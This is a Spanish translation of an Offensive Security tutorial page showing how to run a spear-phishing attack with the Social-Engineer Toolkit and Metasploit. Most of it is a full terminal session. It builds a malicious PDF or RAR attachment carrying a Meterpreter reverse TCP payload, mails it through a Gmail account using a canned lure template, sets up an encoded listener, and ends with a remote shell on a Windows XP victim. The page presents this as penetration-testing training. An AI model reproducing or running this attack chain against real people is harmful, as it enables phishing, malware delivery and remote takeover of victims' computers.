Ataque Spear-Phishing
De www.metasploit-es.com.ar
Vector de Ataque Spear-Phishing
Como se ha mencionado previamente, el vector de ataque Spear Phishing puede ser utilizado para enviar emails dirigidos a objetivos con adjuntos maliciosos. En este ejemplo, vamos a llevar a cabo un ataque, integrarlo en GMAIL y enviar un PDF malicioso a la victima. Notese que puedes crear y salvar tus propias plantillas para utilizar en futuros ataques SE o puedes utilizar las preconstruidas. Al utilizar SET notese tambien que al pulsar intro, por defecto siempre se utilizara el puerto 443 para la conexion inversa y un payload meterpreter inverso.
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Third Party Modules
9. Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit
Enter your choice: 1
Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu
Enter your choice: 1
Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)
Enter the number you want (press enter for default): 1
1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)
Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.
As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
Enter your choice: 1
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
Enter your choice: 1
Below is a list of available templates:
1: Baby Pics
2: Strange internet usage from your computer
3: New Update
4: LOL...have to check this out...
5: Dan Brown's Angels & Demons
6: Computer Issue
7: Status Report
Enter the number you want to use: 7
Enter who you want to send email to: kennedyd013@gmail.com
What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay
Enter your choice: 1
Enter your GMAIL email address: kennedyd013@gmail.com
Enter your password for gmail (it will not be displayed back to you):
SET has finished delivering the emails.
Do you want to setup a listener yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10268 updated today (2010.09.09)
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >
Una vez hemos configurado todo el ataque, la victima abre el email y el PDF:
Tan pronto como la victima abre el adjunto, una shell se nos presenta de vuelta a nosotros:
[*] Sending stage (748544 bytes) to 172.16.32.131 [*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at Thu Sep 09 09:58:06 -0400 2010 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 3940 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>
El ataque spear-phishing puede enviarse a multiples personas o a individuos, se integra en Google mail y puede ser personalizado completamente basandose en tus necesidades para el vector de ataque. En definitiva es muy efectivo para email spear-phishing.
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
